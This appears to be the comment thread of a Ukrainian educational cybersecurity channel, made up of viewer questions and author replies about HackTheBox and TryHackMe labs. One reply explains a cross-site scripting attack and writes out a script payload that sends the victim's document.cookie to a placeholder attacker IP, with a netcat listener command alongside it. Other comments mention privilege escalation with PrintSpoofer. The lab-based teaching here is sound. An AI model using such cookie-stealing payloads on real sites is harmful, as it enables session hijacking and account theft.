Даний канал створений для навчання і розвитку навичок кібербезпеки. Це не пропаганда хакінгу і зламу. Тут ми вчимося думати, аналізувати і розробляти стратегії захисту. Всі дії проводяться або на домашніх віртуальних машинах, або на спеціальних навчальних площадках типу HackTheBox та TryHackMe.
cmp eax, dword[ebp-30] - порівння, і про це тобі пише в коментарях в самому дебагері, xor - теж не порівняння, а логічне виключення. Не варто без основ лізти в реверс якщо не знаєш базу, не варто розкривати цю тему. Ви молоді, жартівливі, вам легко. Це не те. Це не Чикатіло і навіть не архіви спецслужб. Сюди краще не лізти. Серйозно, будь-хто з вас шкодуватиме. Краще закрийте тему та забудьте, що тут писалося. Я цілком розумію, що даним повідомленням викликаю додатковий інтерес, але хочу одразу застерегти допитливих - стоп. Решту просто не знайдуть.
Навчатись завжди сенс є. Я б для початку порекомендував академію TryHackMe, але судячи з рівня ваших питань, Ви сміливо можете проходитит більш складну академію від HTB
Не зовсім зрозумів, чому заміна user-agent в запиті на тег html img повернула адмінську куку. Цей тег парситься і виконується браузером на стороні клієнта при рендерінгу в разі помилки, тобто в даному випадку - недійсному джерелі картинки. Можете пояснити? За відео - дякую!
Дуже слушне запитання. Це атака типу Cross Site Scripting. Суть самої команди в тому, щоб на стороні клієнта браузер знайшов посилання на картинку, але не отримав до неї маршрута. А в разі помилки(onerror) він звернувся до нашого АйПі і відправив нам кукі юзера браузера(+document.cookie). Ми ж все це отримуємо на своєму ПК за допомогою NetCat Listener(nc -lnvp PORT). Також можна було б використати, наприклад і таку команду - <script>var i=new Image(); i.src="OUR IP:OUR PORT/?cookie="+btoa(document.cookie);</script>
А чому ми не могли ту саму куку отримати з того ж Burp у відповіді сервера, коли отримали сторінку з помилкою? Чи Ви мали бажання продемонструвати xss вразливість? Мене дещо дивує, що сервер разом зі сторінкою помилки повертає адмінську куку. Але мабуть це просто, в якості геймефікації процесу зроюлено htb, бо в реальному житті, як на мене в цьому мало сенсу. Мабуть для реалізації xss в користувача на сусідній вкладці має вже бути відкрита алмінська сесія, чи жива адмінська кука. Дякую за відповідь.
@@ТкачукИгорь Абсолютно вірно кажете. По-перше, так, це деяка гейміфікація. По-друге, "машинка" налаштована так, що відкрита з боку браузера адмінська сессія. По-третє, в реальних кейсах це не дуже ймовірний напрям атаки, адже завжди ефективніше відправити фішингові листи, чи підібрати пароль звичайних юзерів і вже від легітимного юзера відправити знову ж таки фішинговий дист адміну
Колись я так само дивився подібні відео і майже нічого не розумів... Але, якщо у вас є базові знання в комп'ютерних технологіях, то за рік цілком можливо підтягнутись до пристойного рівня
Я використовую `pwgen 18 1 -y` рік від року потроху збільшуючи довжину та Bitwarden. Останній крім функціоналу збереження паролів має у веб-версії розділ Reports який є гарним помічником в дотриманні гігієни паролів. Він покаже які з ваших паролів є в публічно доступних базах, покаже ваші паролі які ви ре-юзаєте на кількох сайтах, слабкі паролі і таке інше. Звичайно тут вже є ризики зламу самого Bitwarden, але наче можна власноруч хостити сховище (але це не точно).
Якшо це був не жарт щодо вийти із Vim, то поділюсь лайфаком, якого мене навчили бородаті адміни і адмінші в одном старом київськом дата-центрі: самий зручний на мій погляд хоткей для виходу це ZZ щоб вийти і зберегти та ZQ щоб вийти без збереження (саме на Шифті). Воно як раз прожимається одной лівой рукой дуже зручно.
Дуже круто, як на мене. Я колись Kali завантажува і щось пробував робити, але мене потім в back-end завернуло і на тому моє знайомство з цим закінчилось. Зараз дивлюсь з задоволенням і вже руки чухаються спробувати знову) ПС. чудова в тебе шпаргалочка)
Лагуча машинка попалася. Не знаю,баг це чи ні, але я отримав адміністратора за допомогою SeImpersonatePrivilege і PrintSpoofer. Так ось при команді whoami /priv показувало ось це: SeIncreaseQuotaPrivilege Ajustar las cuotas de la memoria para un proceso Enabled SeSecurityPrivilege Administrar registro de seguridad y auditor¡a Enabled SeTakeOwnershipPrivilege Tomar posesi¢n de archivos y otros objetos Enabled SeLoadDriverPrivilege Cargar y descargar controladores de dispositivo Enabled SeSystemProfilePrivilege Generar perfiles del rendimiento del sistema Enabled SeSystemtimePrivilege Cambiar la hora del sistema Enabled SeProfileSingleProcessPrivilege Generar perfiles de un solo proceso Enabled SeIncreaseBasePriorityPrivilege Aumentar prioridad de programaci¢n Enabled SeCreatePagefilePrivilege Crear un archivo de paginaci¢n Enabled SeBackupPrivilege Hacer copias de seguridad de archivos y directorios Enabled SeRestorePrivilege Restaurar archivos y directorios Enabled SeShutdownPrivilege Apagar el sistema Enabled SeDebugPrivilege Depurar programas Enabled SeSystemEnvironmentPrivilege Modificar valores de entorno firmware Enabled SeChangeNotifyPrivilege Omitir comprobaci¢n de recorrido Enabled SeRemoteShutdownPrivilege Forzar cierre desde un sistema remoto Enabled SeUndockPrivilege Quitar equipo de la estaci¢n de acoplamiento Enabled SeManageVolumePrivilege Realizar tareas de mantenimiento del volumen Enabled SeImpersonatePrivilege Suplantar a un cliente tras la autenticaci¢n Enabled SeCreateGlobalPrivilege Crear objetos globales Enabled SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Enabled SeTimeZonePrivilege Cambiar la zona horaria Enabled SeCreateSymbolicLinkPrivilege Crear v¡nculos simb¢licos Enabled SeDelegateSessionUserImpersonatePrivilege Obt‚n un token de suplantaci¢n para otro usuario en la misma sesi¢n Enabled
Дякую за питання! Я б не поділяв саме тут на Win чи Linux, адже ми більше використовували вразливість сервісу SMB. Для Linux є аналогічний CVE-2017-7494. P. S. Відчуваю потребу в записі відоса на тему "що потрібно, аби стати пентестером"